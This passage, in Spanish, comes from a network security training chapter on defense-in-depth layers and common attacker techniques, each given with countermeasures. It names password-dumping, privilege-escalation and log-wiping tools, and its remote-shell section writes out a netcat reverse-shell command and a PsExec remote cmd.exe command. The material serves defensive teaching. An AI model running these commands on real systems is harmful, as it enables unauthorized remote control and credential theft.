unidades de disquete y de CD-ROM de los sistemas que no los requieran.
 Por último, compruebar que todo el hardware de red está físicamente
protegido. Si los servidores están protegidos en una sala o armario con
cerradura, los enrutadores y conmutadores adjuntos también deben estar
protegidos físicamente. De lo contrario, un intruso puede llegar fácilmente
hasta un equipo portátil o de escritorio, y atacar a los servidores desde
dentro del perímetro. Una vez más, se debe controlar la administración de
los dispositivos de red; de lo contrario, pueden utilizarse para perpetrar un
ataque contra el resto de la infraestructura.

1.31. Descripción del nivel perimetral

Cap1-15.jpg

El perímetro de red es el área de una red que está más expuesta a un ataque
del exterior. Los perímetros de red se pueden conectar a numerosos entornos
diferentes, que van desde socios comerciales a Internet. Cada organización usa
criterios distintos para definir su perímetro. Los criterios pueden incluir algunas o
todas las conexiones descritas en la diapositiva.

1.32. Compromiso de la seguridad del nivel de perímetro

Cap1-16.jpg

 La mayoría de los expertos en seguridad se centran en el área desde la

que cabe esperar que se origine un ataque, como Internet. Sin embargo,
los intrusos también son conscientes de que ésta será la solución que
probablemente utilice e intentarán atacar la red desde algún otro lugar. Es
muy importante que todas las entradas y salidas de la red sean seguras.
 Es improbable que uno sea el responsable de la implementación de
seguridad de los socios comerciales; por lo tanto, no se puede confiar
completamente en todo el acceso que se origine en ese entorno. Además,
no se tiene control del hardware de los usuarios remotos, lo que
constituye otro motivo para no confiar en el mismo. Las sucursales
podrían no contener información confidencial y, por lo tanto, es posible
que tengan una implementación menos segura. Sin embargo, podrían
tener vínculos directos a la oficina principal que un intruso podría usar.
 Es importante considerar la seguridad de la red en conjunto, no sólo en
áreas individuales.
1.33. Protección del nivel de perímetro

Cap1-17.jpg

 La protección de los perímetros se puede llevar a cabo principalmente

con servidores de seguridad. La configuración de un servidor de
seguridad puede ser difícil desde el punto de vista técnico. Por lo tanto,
los procedimientos deben detallar claramente los requisitos.
 Los sistemas operativos recientes de Microsoft® Windows® facilitan el
bloqueo de los puertos de comunicación innecesarios para reducir el perfil
de ataque de un equipo.
 La traducción de direcciones de red (NAT, Network Address Translation)
permite a una organización disimular las configuraciones de direcciones
IP y de puertos internos para impedir que usuarios malintencionados
ataquen los sistemas internos con información de red robada. Los
mecanismos de seguridad del perímetro pueden ocultar también los
servicios internos, incluso aquellos que están disponibles externamente,
de modo que un intruso nunca se comunique de forma directa con ningún
sistema que no sea el servidor de seguridad desde Internet.
 Cuando los datos salen del entorno que está bajo la responsabilidad de
uno, es importante que se encuentren en un estado que garantice su
seguridad y que lleguen intactos a destino. Esto se puede conseguir
 mediante protocolos de túnel y cifrado, con el fin de crear una red privada
virtual (VPN, Virtual Private Network).
 El protocolo de túnel que emplean los sistemas de Microsoft es el
Protocolo de túnel punto a punto (PPTP, Point-to-Point Tunneling
Protocol), que utiliza Cifrado punto a punto de Microsoft (MPPE, Microsoft
Point-to-Point Encryption), o Protocolo de túnel de nivel 2 (L2TP, Layer 2
Tunneling Protocol), que utiliza el cifrado de IPSec.
 Cuando los equipos remotos establecen comunicación a través de una
VPN, las organizaciones pueden seguir pasos adicionales para examinar
esos equipos y garantizar que cumplan una directiva de seguridad
predeterminada. Los sistemas que establecen la conexión se aíslan en un
área independiente de la red hasta que se completan las comprobaciones
de seguridad.
 Los sistemas del perímetro también deben tener usos claramente
definidos. Bloquear o deshabilitar cualquier otra funcionalidad.
 Firewall de Windows, que se incluye con Windows XP y Windows Server
2003, puede extender la protección del perímetro a los usuarios remotos.
 La protección del perímetro de una red es el aspecto más importante para
parar un ataque del exterior. Si un perímetro sigue siendo seguro, la red
interna se debe proteger contra ataques externos. Se enumeran abajo
algunas maneras de implementar la defensa del perímetro:

Packet Filtering, Inspección de paquetes, Intrusion Detection

1.34. Descripción del nivel de red interna

 Cap1-18.jpg

Los ataques no provienen sólo de orígenes externos. Tanto si los ataques

internos son genuinos como si son meros accidentes, muchos sistemas y
servicios se dañan desde dentro las organizaciones.

Es importante implementar medidas internas de seguridad orientadas a las

amenazas mal intencionadas y accidentales.

1.35. Compromiso de la seguridad del nivel de red interna

 Cap1-19.jpg

 El acceso a los sistemas y recursos de red internos permite a los intrusos

obtener acceso fácilmente a los datos de la organización.
 Mediante el acceso a la infraestructura de red también pueden supervisar
la red e investigar el tráfico que se está transportando. Las redes
totalmente enrutadas, aunque hacen que la comunicación sea más fácil,
permiten a los intrusos tener acceso a los recursos de la misma red
independientemente de si se encuentran o no en ella.
 Los sistemas operativos de red tienen instalados muchos servicios. Cada
servicio de red constituye un posible medio de ataque.

1.36. Protección en el nivel de red interna

Uno puede tener una serie de redes en su organización y debe evaluar cada una
individualmente para asegurarse de que está asegurada apropiadamente. Se
enumeran abajo algunas maneras de implementar defensas de red:

VLAN Access Control Lists, Internal Firewall, Auditing, Intrusion Detection

 Para proteger el entorno de la red interna, se debe requerir que cada

usuario se autentique de forma segura en un controlador de dominio y en
los recursos a los que tenga acceso. Utilizar la autenticación mutua, de
 modo que el cliente también conozca la identidad del servidor, con el fin
de impedir la copia accidental de datos a los sistemas de los intrusos.
 Segmentar físicamente los conmutadores, es decir, crear particiones de la
red para impedir que toda ella esté disponible desde un único punto. Se
puede crear particiones si se utilizan enrutadores y conmutadores de red
independientes o si crean varias redes virtuales de área local (VLAN,
Virtual Local Area Network) en el mismo conmutador físico.
 Considerar cómo se van a administrar los dispositivos de red, como los
conmutadores. Por ejemplo, el grupo de trabajo de red podría utilizar
Telnet para tener acceso a un conmutador o enrutador y realizar cambios
de configuración. Telnet pasa todas las credenciales de seguridad en
texto sin cifrar. Esto significa que los nombres y las contraseñas de los
usuarios son accesibles para cualquiera que pueda rastrear el segmento
de red. Esto puede constituir una debilidad importante de la seguridad.
 Considerar permitir únicamente el uso de un método seguro y cifrado,
como SSH de shell o acceso de terminal serie directo.
 También se deben proteger adecuadamente las copias de seguridad de
las configuraciones de dispositivos de red. Las copias de seguridad
pueden revelar información sobre la red que resulte útil a un intruso. Si se
detecta una punto débil, se pueden utilizar copias de seguridad de la
configuración de los dispositivos para realizar una restauración rápida de
un dispositivo y revertir a una configuración más segura.
 Restringir el tráfico aunque esté segmentado. Puede utilizar 802.1X para
proporcionar un acceso cifrado y autenticado tanto en las LAN
inalámbricas como en las estándar. Esta solución permite utilizar cuentas
de Active Directory y contraseñas o certificados digitales para la
autenticación. Si se utilizan certificados, se tendrá que integrar una
infraestructura de clave pública (PKI, Public Key Infrastructure), en
Servicios de Windows Certificate Server; para las contraseñas o
certificados, también necesitará un servidor RADIUS integrado en el
Servicio de autenticación Internet (IAS, Internet Authentication Service) de
Windows. En Windows Server 2003 se incluyen IAS y Servicios de
Certificate Server.
 Implementar tecnologías de cifrado y firma, por ejemplo la firma de IPSec
o bloque de mensajes de servidor (SMB, Server Message Block), con el
fin de impedir a los intrusos rastrear los paquetes de la red y reutilizarlos.

1.37. Descripción del nivel de host

 Cap1-20.jpg

Es probable que los sistemas de una red cumplan funciones específicas. Esto
afectará a la seguridad que se les aplique.

1.38. Compromiso de la seguridad del nivel de host

 Cap1-21.jpg

 Se puede atacar a los hosts de red con funciones que se sabe que están
disponibles de forma predeterminada, aunque el servidor no las necesita
para realizar su función.
 Los intrusos también podrían distribuir virus para emprender un ataque
automatizado.
 El software instalado en sistemas de equipos podría tener puntos débiles
que los intrusos pueden aprovechar. Es importante permanecer informado
de todos los problemas de seguridad del software de su entorno.

1.39. Protección en el nivel de host

Se debe evaluar cada host en su ambiente y crear las políticas que limitan cada
servidor solamente a esas tareas que se tienen que realizar. Esto crea otra
barrera de seguridad que un atacante necesitaría evitar antes de hacer cualquier
daño.

Server Hardening, Host Intrusion Detection, IPSec Filtering, Auditing

 Tanto en los sistemas cliente como en los servidores, las técnicas de
refuerzo dependerán de la función del equipo. En cada caso, se pueden
utilizar plantillas de seguridad y plantillas administrativas con directivas de
grupo para proteger estos sistemas.
 En los sistemas cliente, también se pueden utilizar directivas de grupo
para restringir los privilegios de los usuarios y controlar la instalación de
software. El uso de directivas de grupo para limitar las aplicaciones que
un usuario puede ejecutar impide que éste ejecute de forma inadvertida
código de tipo Caballo de Troya.
 En los sistemas de servidor, las técnicas de refuerzo también incluyen la
aplicación de permisos NTFS, la configuración de directivas de auditoría,
el filtrado de puertos y la realización de tareas adicionales según la
función del servidor.
 Mantener el servidor y el cliente actualizados con respecto a las
actualizaciones también mejora la seguridad. Microsoft proporciona varias
formas de aplicar revisiones a los sistemas, por ejemplo, mediante
Windows Update, Software Update Service y Microsoft Systems
Management Server (SMS).
 La utilización de un paquete antivirus actual y de un servidor de seguridad
personal, como Firewall de Windows, disponible con Windows XP y con
los sistemas operativos posteriores, puede reducir mucho la parte
expuesta a un ataque de un equipo cliente.

1.40. Descripción del nivel de aplicación

 Cap1-22.jpg

 Las aplicaciones de red permiten que los clientes tengan acceso a los
datos y los traten. También constituyen un punto de acceso al servidor
donde se ejecutan las mismas.
 Recordar que la aplicación proporciona un servicio a la red. Este servicio
no debe anularse con la implementación de seguridad.
 Examinar las aplicaciones desarrolladas internamente, además de las
comerciales, en busca de problemas de seguridad.

1.41. Compromiso de la seguridad del nivel de aplicación

 Cap1-23.jpg

 Los intrusos cuyo interés son las aplicaciones pueden bloquear alguna
para conseguir que su funcionalidad deje de estar disponible.
 Las aplicaciones pueden tener defectos que los atacantes pueden
manipular para ejecutar código malintencionado en el sistema.
 Un intruso podría utilizar en exceso un servicio de modo que se
imposibilite su uso legítimo; éste es un tipo de ataque de denegación de
servicio.
 Una aplicación también podría utilizarse para llevar a cabo tareas para las
que no esté destinada, como enrutar correo electrónico.

1.42. Protección en el nivel de aplicación

Como otra capa de defensa, Application Hardening es una parte esencial de

cualquier modelo de seguridad. Cada aplicativo en una organización debe ser
probado a fondo para la conformidad de seguridad en un ambiente de prueba
antes de que se permita su puesta en producción.

Validation Checks, Verify HTML / Cookies Source, Secure IIS

 Las instalaciones de las aplicaciones sólo deberían incluir los servicios y

funcionalidad requeridos.
 Las aplicaciones desarrolladas internamente se deben evaluar para
descubrir vulnerabilidades en la seguridad de una forma continuada y
 deben desarrollarse e implementarse revisiones para cualquier
vulnerabilidad que se identifique.
 Las aplicaciones que se ejecutan en la red se deben instalar de forma
segura y se les deben aplicar todas las revisiones y Service Packs
correspondientes.
 Debe ejecutarse software antivirus para ayudar a impedir la ejecución de
código malintencionado.
 Si una aplicación se ve comprometida, es posible que el intruso pueda
tener acceso al sistema con los mismos privilegios con los que se ejecuta
la aplicación. Por lo tanto, ejecutar los servicios y aplicaciones con el
menor privilegio necesario.
 Al desarrollar nuevas aplicaciones personalizadas, implementar las
recomendaciones más recientes de ingeniería de seguridad.

1.43. Descripción del nivel de datos

Cap1-24.jpg

 El nivel final lo constituyen los datos. Los sistemas de equipos

almacenan, procesan y ofrecen datos. Cuando los datos se procesan en
un formato con significado, se convierten en información útil.
 Los datos sin formato y la información que se almacena en un sistema
son objetivos de un posible ataque. El sistema mantiene los datos en
medios de almacenamiento masivo, generalmente en un disco duro.
 Todas las versiones recientes de Microsoft Windows admiten varios
sistemas de archivos para almacenar y tener acceso a los archivos en un
disco. Uno de estos sistemas, NTFS, se puede utilizar en Microsoft
Windows NT®, Windows 2000, Windows XP y Microsoft Windows
Server™ 2003. Proporciona tanto permisos de archivo como de carpeta
para ayudar a proteger los datos.
 NTFS admite características adicionales, como la auditoría y el Sistema
de archivos de cifrado (EFS, Encrypting File System), que se utiliza para
implementar la seguridad en los datos.

1.44. Compromiso de la seguridad del nivel de datos

Cap1-25.jpg

 Los intrusos que obtienen acceso a un sistema de archivos pueden hacer

un daño enorme u obtener gran cantidad de información. Pueden ver
archivos de datos y documentos, algunos de los cuales tal vez contengan
 información confidencial. También pueden cambiar o quitar la
información, lo que puede ocasionar varios problemas a una
organización.
 El servicio de directorio Active Directory utiliza los archivos del disco para
almacenar la información del directorio. Estos archivos se almacenan en
una ubicación predeterminada cuando el sistema se promueve a
controlador de dominio. Como parte del proceso de promoción, sería
aconsejable almacenar los archivos en algún lugar diferente de la
ubicación predeterminada porque de este modo quedarían ocultos de los
intrusos. Dado que los nombres de los archivos son conocidos (tienen el
nombre de archivo NTDS.dit), si únicamente se reubican es probable que
sólo se consiga entorpecer el trabajo del intruso. Si los archivos de
directorio se ven comprometidos, todo el entorno del dominio queda
expuesto al riesgo.
 Los archivos de aplicación también se almacenan en disco y están
expuestos a un ataque, con lo que se ofrece a los intrusos la oportunidad
de interrumpir la aplicación o manipularla con fines malintencionados.

1.45. Protección en el nivel de datos

 EFS permite el cifrado de los archivos cuando residen en el sistema de

archivos. Se basa en el formato NTFS del disco, que está disponible
desde Windows 2000. Es importante entender que EFS no cifra los
archivos mientras se están transmitiendo a través de una red. El proceso
de cifrado utiliza una clave para cifrar el archivo y la tecnología de claves
pública y privada para proteger dicha clave.
 NTFS también proporciona seguridad en los archivos y en las carpetas.
De este modo, se permite la creación de listas de control de acceso para
definir quién ha obtenido acceso a un archivo y qué acceso tiene.
 El aumento de la protección del nivel de datos debe incluir una
combinación de listas de control de acceso y cifrado. Al cifrar un archivo,
únicamente se impide la lectura no autorizada; no se evita ninguna acción
que no requiera la lectura del archivo, como la eliminación. Para impedir
la eliminación, utilice listas de control de acceso.
 Puesto que los datos son esenciales en muchos negocios, es importante
que su recuperación sea un proceso conocido y probado. Si se realizan
copias de seguridad con regularidad, cualquier alteración o eliminación de
datos, ya sea accidental o malintencionada, puede recuperarse a partir de
las copias de seguridad cuando corresponda. Un proceso confiable de
copia de seguridad y restauración es vital en cualquier entorno. Además,
se deben proteger las cintas de copia de seguridad y restauración. Las
copias de las cintas de copia de seguridad y restauración se debe
mantener en otro lugar, en una ubicación segura. El acceso no autorizado
 a las cintas de copia de seguridad es igual de dañino que infringir la
seguridad física de la infraestructura.
 Las listas de control de acceso sólo funcionan en documentos dentro del
sistema de archivos para el que se hayan habilitado. Una vez que se han
copiado los documentos a otra ubicación (por ejemplo, a la unidad de
disco duro local de un usuario), no se sigue controlando el acceso.
Windows Rights Management Services (RMS), que se incluye con
Windows Server 2003, mueve la función de control de acceso al propio
objeto de forma que dicho control se aplica independientemente de dónde
se almacene el documento físico. RMS también ofrece a los creadores de
contenido un mayor control sobre las acciones particulares que un usuario
tiene permitido llevar a cabo; por ejemplo, el destinatario puede tener
concedido acceso para leer un documento, pero no para imprimir o copiar
y pegar; en el correo electrónico enviado con Microsoft Office Outlook®
2003, el remitente del mensaje puede impedir que los destinatarios
reenvíen el mensaje.

1.46. Respuesta a incidentes de seguridad

En este tema, se explicará cómo responder a incidentes de seguridad.

Específicamente, se tratará:
 El uso de una lista de comprobación de respuesta a incidentes.
 La contención de los efectos de un ataque.

1.47. Determinación de Riesgos de Seguridad

 Cap1-32.jpg

Para determinar riesgos de seguridad, puede ayudar el preguntarse "cuál sería

el daño al negocio si…" Intente pensar en qué se pueden comprometer su red y
cómo afectará el negocio. Éstos pueden incluir aplicativos de línea de negocio,
datos del cliente, etcétera.

Una vez que se haya formulado una lista, identificar qué puede dañar su negocio
más, si está comprometido. Los daños posibles pueden incluir:

 Tiempo muerto
 Pérdida de negocio
 Reputación dañada
 Confianza del cliente
 Uso fraudulento de la información
 Responsabilidad Legal

Después que usted ha determinado los posibles riesgos, pregúntese "¿qué

puedo yo hacer para atenuar el riesgo?"
Para más información, ir a Microsoft Press book Windows Security Resource Kit
así como en Microsoft Solution for Securing Windows 2000
http://go.microsoft.com/fwlink/?LinkId=14837

1.48. Tecnicas de Hacking

Cap1-33.jpg

 Footprinting
 Scanning
 Enumeration
 Gaining Access
 Privilege Escalation
 Buffer Overflows
 Shovel a Shell
  Interactive Control
 Camouflaging
 Intelligence Gathering
 Island Hopping
 Denial of Service
 Social Engineering

Luego, mirar algunas técnicas comunes de hacking. Cuanto más se aprende

sobre las técnicas usadas por el hacker, mejor se puede proteger una red contra
estas técnicas.

Nota: Esto no es un manual de cómo atacar sistemas pero es en algo una

descripción de las técnicas usadas por los atacantes.

1.48.1. Tecnicas de Hacking: Footprinting

El uso de un atacante de herramientas y de la información para crear un perfil

completo de la postura de la seguridad de una organización se conoce como
footprinting. Por ejemplo, antes de que un hacker ataque una red, el/ella quiere
conocer la información que incluye:

 Presencia en Internet/ extranet de la compañía

 La política de la compañía con respecto al acceso remoto
 La versión utilizada de software en los servers (IIS, Exchange etc)
 Los rangos IP de los cuales es propietaria la organizacion
 Desafíos técnicos hechos por la compañía
 Las fusiones o las adquisiciones que terminaron recientemente, estan en
marcha o pendientes

Hay muchas herramientas que pueden ayudar a un hacker a poner junta toda la
información sobre una compañía. Puede ser tan simple como usar un Search
Engine para encontrar la información tal como la que fija el detalle técnico de un
administrador, usar al USENET o detalles incluidos en publicidad de una
compañía.

Más información un atacante tiene antes de comenzar su ataque y por lo tanto

más fácil será para que apunten una debilidad específica en la infraestructura.

1.48.2. Técnicas de Hacking: Scanning

Como resultado del footprinting, un hacker puede identificar la lista de red y las
direcciones IP utilizadas en la compañía. El siguiente paso lógico para un hacker
es el scanning. El uso de un atacante de herramientas y de la información es
para determinar qué sistemas estas vivos y accesibles desde Internet así como
qué puertos están escuchando en cualquier sistema dado. Con ese
conocimiento, el atacante puede apuntar los sistemas específicos que funcionan
con software o servicios específicos usando exploit conocidos.

1.48.3. Técnicas de Hacking: Enumeration

Enumeration implica el uso de un atacante de herramientas para obtener la

información detallada sobre un sistema remoto - por ejemplo servicios
ejecutándose, todos los shares, cuentas de usuario, grupos, miembros de un
dominio, politicas de cuentas (lockout, password age, etc.

Un hacker típicamente utiliza enumeration no intrusiva probando si la

información que obtuvo es suficiente para un ataque.

Nota:
 RestrictAnonymous = 1 es derrotado fácilmente por las ultimas
herramientas de enumeración (NBTEnum2.1.exe, DumpSec)
 RestrictAnonymous=2 puede afectar la funcionalidad. Es esencial probar
sistemas críticos para asegurarse de que los cambios de la seguridad no
afectarán sistemas de producción de una manera negativa.
 Renonbrar las cuentas administrativas es un buen punto para no utilizar
RestrictAnonymous configurado con valor =2 o bloquear el acceso a
puertos. NetBIOS una variedad de herramientas tienen la habilidad de
poder determinar cuentas administrativas basadas en SID / RID
enumerados vía queries NetBIOS.

Propósito:
Usar la información detallada acerca del sistema remoto, servicios, shares,
cuentas de usuarios, grupos, información de controladores de dominio, políticas
de cuentas, etc, habilita al atacante a utilizar herramientas con el intento de
atacar la seguridad de cuentas y servicios en el objetivo.

1.48.4. Técnicas de Hacking: Port Redirection

Cuando se tiene configurado un firewall para bloquear determinados puertos de

acceso entrante, un hacker puede usar port redirection como camino de acceso
a la red. Port redirection es utilizado para escuchar en algunos puertos. Los
paquetes son redireccionados a destinos específicos.

Nota:
 El Port Redirector tiene que instalarse en un servidor detrás de un firewall.
 Usar algún otro exploit (IIS buffer overflow, etc.). El resto de las pautas de
seguridad atenuarán a menudo el riesgo de este tipo de ataque.
  Utilizar una política IPSec para permitir el acceso a los puertos abiertos
de las máquinas específicas.
 El filtrado de ingreso parece ser usualmente la parte importante, pero el
filtrado de egreso es importante también!
 En otras palabras si un IIS Server solamente necesita hablar con un solo
COM+ server en una DMZ en un puñado de puertos, configurar una
politica IPSec para hacer cumplir esta política, no permitir al server IIS
para comunicarse con cualquier servidor en la red en cualquier puerto,
¡filtro es tráfico de salida también!

También, estar enterado del tipo de excedente de tráfico en cualquier puerto

dado. Si se ve el tráfico ICMP que debe tener una carga útil cero del octeto o
contener una carga útil 500k o de tráfico de TFTP en el puerto 80, eso debe
alertar, más aún si no es parte de sus operaciones estándares.

Propósito:
Después que el atacante tiene identificado y accede al trafico del firewall que
puede permitir tráfico de entrada de un puerto origen 53, procurar instalar un
software Port Redirector en el equipo dentro del firewall. El Port Redirector
tomará el tráfico entrante destinado para un puerto (53) y lo enviará a otro
equipo detrás del firewall en otro puerto (3389).

Ejemplo:
FPipe.exe – herramienta port redirection de linea de commandos

Contramedidas:
El Port Redirector tiene que instalarse de alguna manera en un servidor detrás
del firewall usando otro exploit (IIS buffer overflow, etc.). El resto de las guías de
seguridad atenuarán el riesgo de este tipo de ataque.

Usar una política de IPSec para permitir solamente el acceso a los puertos
abiertos de las máquinas específicas.

1.48.5. Técnicas de Hacking: Gaining Access

Hay varias herramientas disponibles que pueden permitir a un hacker tomar

control de un sistema. Por ejemplo, Samdump y Brutus son crackers de
passwords. Samdump se utiliza extraer el hashes del password de los archivos
SAM. Brutus es un cracker de password remoto. Si un hacker consigue el
acceso a una copia de una base de datos SAM, el hacker podría utilizar
l0phtcrack y extraer los usuarios y passwords exactos.

ATACAR LA SAM MIENTRAS QUE ESTÁ EN LÍNEA

Propósito:
Los atacantes consiguen los password hashes de la SAM en un sistema en línea
para comprometer cuentas adicionales.

Utilizan las herramientas por ejemplo PWdump2 que utiliza una técnica conocida
como ‘DLL injection’ para inyectar código malicioso en LSASS.EXE (a trusted
process). LSASS puede solicitar password hashes desencriptados para saltear
la protección de SYSKEY.

Ejemplos:
Samdump
Pwdump1,2,3,3e
LC3 / LC4

Contramedidas:
SYSKEY está habilitado por defecto en Windows 2000 en modo 0 y encripta con
hashes de 128bit. La key para desencriptar se guarda en registry.
Herramientas recientes como PWDump3,3e & LC3 (que usan PWDump) pueden
sortear todas las protecciones de ’ SYSKEY en todos los modos para extraer los
passwords.

Evitar que un atacante descargue hashes es la mejor contramedida pero para el

aseguramiento agregado hacer el siguiente:

 Desabilitar la posibilidad de guardar los LM hashed password en registry

(habilitado por defecto).
 Cambiar todos los passwords luego de hacer esto!
 Requerir password complejas (recomendado 15 caracteres alfanuméricos
–ej. !@#$%^&*-)

ATACAR UNA COPIA FUERA DE LÍNEA DE LA SAM

Propósito:
Existen numerosos exploits de IIS para obtener una copia de la SAM.
El acceso físico incorrecto puede conceder el acceso a la SAM
Ej. ERD disk olvidado en el Floppy Drive, administradores locales se olvidan de
bloquear la consola.
¡Esto permite obtener una copia de la SAM con el fin el conseguir hashes!

Ejemplo
CHNTPW es una herramienta que funciona con UNIX y DOS. Un UNIX boot
floppy está disponible y puede obtener una copia de la SAM, SYSTEM y
SECURITY en una RAM drive para directamente ver y editar con CHNTPW.
Si la protección SYSKEY está habilitada (esto es por defecto en la SAM de
Windows 2000), CHNTPW no puede desencriptar los hashes almacenados en la
SAM pero puede escribir nuevos hashes en esta SAM habilitando al atacante el
cambio de password para una cuenta (ej. administrator). Con esta cuenta, luego
puede iniciar sesión y obtener el resto de las password (usando PWDump3 etc.).

Contramedidas
 No permitir la copia de la SAM.
 Deshabilitar el almacenamiento de LM hashed password en la SAM.
 Habilitar SYSKEY en modo 2 o 3 para requerir una password ó un floppy
que contenga la key privada antes de poder iniciar sesion.
 Si un atacante puede inhabilitar SYSKEY y escribir una nueva password
para el administrador en la SAM, todos los password hashes del resto de
las cuentas continuan encriptados y protegidos del ataque.

Notas: Para deshabilitar el almacenamiento de LM hash en la SAM refiérase a

la siguiente KB: Q299656 New Registry Key to Remove LM Hashes from AD &
SAM http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q299656

SYSKEY fue dasarrollado para encriptar todos los password hashes en la SAM
para prevenir cracking fuera de línea (Q143475 Windows NT System Key
Permits Strong Encryption of the SAM)
http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q143475)
No habilitado por defecto en NT 4.0, habilitado en modo 0 en Windows 2000.

1.48.6. Técnicas de Hacking: Privilege Escalation

Un hacker puede causar la mayoría del daño consiguiendo privilegios

administrativos en una red. Hay varias utilidades que un hacker puede utilizar
para ganar privilegio administrativo. Por ejemplo, la utilidad Getadmin.exe es
usada para otorgar a usuarios comunes privilegios administrativos agregando a
estos usuarios al grupo de administradores. Esta utilidad funciona con todas las
cuentas excepto con la cuenta de Guest.

Es importante observar que cualquier cuenta se haya concedido el “Debug

Programs right”. Siempre se podrá ejecutar satisfactoriamente Getadmin.exe,
incluso después de la aplicación del hotfix. Esto es porque el “Debug Programs
right” habilita al usuario a adjuntar cualquier proceso. El “Debug Programs right”
es inicialmente otorgado a Administradores y debe ser utilizado únicamente con
usuarios altamente confiables.

También, si Getadmin.exe se ejecuta con una cuenta que sea ya un miembro del
grupo local de los administradores, continua funcionando (incluso luego de
aplicar el hotfix).

Nota: Para mas información dirigirse a:

http://support.microsoft.com/default.aspx?scid=kb;en-us;146965
 1.48.7. Tenicas de Hacking: Buffer Overflows

Algunas herramientas de ataque ejecutan código de buffer overruns.

Sobreescribiendo segmentos específicos de la memoria, el atacante puede
volver a dirigir una llamada de la memoria dentro de un programa para llamar su
propio código en vez del código previsto. Tal llamada funcionaría en el contexto
de seguridad del proceso que lo llama más que el nivel de privilegio del usuario.

Propósito:
Las herramientas BO overflow un-checked buffers generan código en
aplicaciones de Server para causar ‘shellcode’ y ejecutarse (usualmente en
contexto ‘SYSTEM’ o ‘IWAM’ si explota IIS / SQL etc.)

Ejemplos:
JILL-WIN32.EXE
Explota IIS .printer overflow
IIS5hack.exe
ISPC.EXE
Exploits IIS .idq overflow
Unicodeloader.pl
HTTPODBC.DLL
SQL buffer overflows
Contramedidas:
Mantener al dia los hotfixes
Deshabilitar servicios innecesarios
Denegar protocolos no necesarios en router / firewall (filtrado ingreso/egreso)
Emplear un sistema IDS actualizado para denegar pedidos sospechosos /
conocidos como attack signaturas.

1.48.8. Técnicas de Hacking: Shovel a Shell

Propósito:
Herramientas de shell Remoto habilitan a los atacantes a acceder al ‘remote
command shell’ en el servidor destino. Los atacantes usan remote shell para
elevar sus privilegios.

Ejemplos:
Netcat
Nc.exe prove una conexion raw a servidores remotos via TCP.
Puede funcionar como un servidor o un cliente
Cryptcat, es igual que Netcat pero encripta los datos via un canal TCP
Nc.exe 10.1.1.10 5000 –e cmd.exe
‘shovel a shell’ de un servidor comprometido de nuevo a una máquina remota
cliente que funciona escuchando en la dirección 10.1.1.10 en el puerto 5000
PSExec.exe \\192.168.1.1 cmd.exe
Requiere acceso administrativo
Requiere acceso a NetBIOS (TCP 139)
Este comando contacta al servidor 192.168.1.1 , ejecuta en forma remota
CMD.EXE y conecta con la “command shell” del cliente.

Contramedidas:
Netcat (nc.exe) puede establecer una conexión TCP al servidor destino en
cualquier Puerto que esté escuchando y no sea utilizado. Es por eso que un
filtrado apropiado en el firewall previene este tipo de ataque.
Politicas IPSec para habilitar trafico entrante únicamente a los Puertos donde
corren servicios es un método eficaz (sólo habilitar trafico en el puerto 80 en
servidores IIS, denegar todo el trafico en otros puertos)

1.48.9. Técnicas de Hacking: Interactive Control

Propósito:
Llamados como ‘RATs’ (Remote Administration Tools).
Éstas son herramientas reales y cautelosas de Administracion Remota
contenidas en .exe llamados aleatoriamente (o camuflados en legitimos .exe).
¡Eso permite que un usuario remoto realice cualquier acción remotamente vía un
puerto a su elecion sin un usuario local del sistema que lo habilite!

Características populares: Keystroke logging, dedicados a grabar password de

servicios populares (AIM, ICQ, File shares etc.), tienen la habilidad de crear file
shares, transferir files, remote desktop, remote execution, reboot system, etc.

Ejemplos:
Sub7, BO2k, NetBus, NT Rootkit
Sub7 es el más popular / NT Rootkit es el más avanzado

Contramedidas:
Puesto que la mayoría de los Trojanos escucha en un puerto para habilitar el
acceso remoto del atacante, un filtrado apropiado de puertos sería lo indicado
para prevenir este ataque.

La mayoría de los productos anti-virus detectarán a éstos y sus variantes pero

hay literalmente millares de variantes nuevas que aparecen a cada hora
Usualmente llegan como archivos adjuntos vía e-mail; por eso no habilitar e-mail
/ internet browsing en servers y controlar los adjuntos a través de
Outlook/Exchange Email Security functionality, Software Restriction Policies,
Filtros en los SMTP gateway o mail server etc.

La mayoría de los Trojanos intentan modificar Run / RunOnce y otras

configuraciones de typo auto-run. Puede utilizarse software de monitoreo como
NetIQ que puede avisar por medio de alertas sobre eventos de modificación de
estas keys de registry. Aplicando permisos de ACLs a estas keys, se puede
reducir (pero no eliminar) estos ataques.

1.48.10. Tecnicas de Hacking: Camouflaging

Después que un hacker logra la entrada en una red, tratará de no dejar rastros
de su presencia y su paso a los Administradores. Hay varias herramientas que
un hacker puede utilizar. Por ejemplo, WinZapper y Elsave pueden ser utilizadas
para borrar registros de los logs de eventos.

NT Rootkits es utilizado a veces por un atacante. En tal ataque, son

reemplazados ciertos archivos con versiones modificadas. Cuando un
administrador utiliza el ejecutable, el atacante obtiene información adicional para
continuar su ataque. Semejantemente, los elementos específicos de salida se
pueden enmascarar por rootkit para camuflar las herramientas de ataque que se
ejecutan en el sistema. Un acercamiento común para detectar archivos
modificados es comparar la versión en el hash de un archivo limpio. Es
importante observar que la comparación se debe hacer en una máquina limpia
usando medios confiables, pues es también es posible que cualquier utilidad del
ataque haya comprometido el sistema en cuestión.

Propósito:
Alertar a el atacante que alguien está investigando.
Se puede utilizar para ejecutar programas destructivos en nombre del
Administrador o instalar backdoor trojans.

Ejemplos:
Sobreescribir los comandos del sistema con comandos del trojano.
Reemplazar tlist.exe, kill.exe etc, con versiones especiales que no listen o
detengan procesos del atacante.
Sobreescribir CMD.EXE con una versión del atacante.

Contramedidas:
Generar las keys MD5 para todos los archivos del sistema importantes y
comprobar hashes con frecuencia.
Configurar una auditoria adecuada de archivos.
Usar permisos apropiados sobre los archivos.
 1.48.11. Técnicas de Hacking: Intelligence Gathering

SNIFFING

Propósito:
 Después de utilizar un sniffer el atacante está en condiciones de obtener
nombres de cuentas y passwords que pasen por la red en texto plano.
 Puede ser utilizado para descubrir otras redes / equipos que pueden estar
comprometidos en un futuro.
 Puede ser utilizado para descubrir otros sniffers.
 Netmon utilizabroadcasts del protocolo BONE.
 Los equipos Windows por defecto responden pedidos ARP (Unix puede
restringir respuestas ARP)
Ejemplos:
WinDump – sniffer de línea de comandos para Windows es similar a TCPDump
para Unix
Ethereal – GUI OSS sniffer similar al network monitor
ScoopLM – dedicado a NTLM hash sniffer
LC3 –usado para captura de hash

Contramedidas:
Usar la ultima versión de NTLM V2 o Kerberos (recomendado) en todos los
equipos de la red.
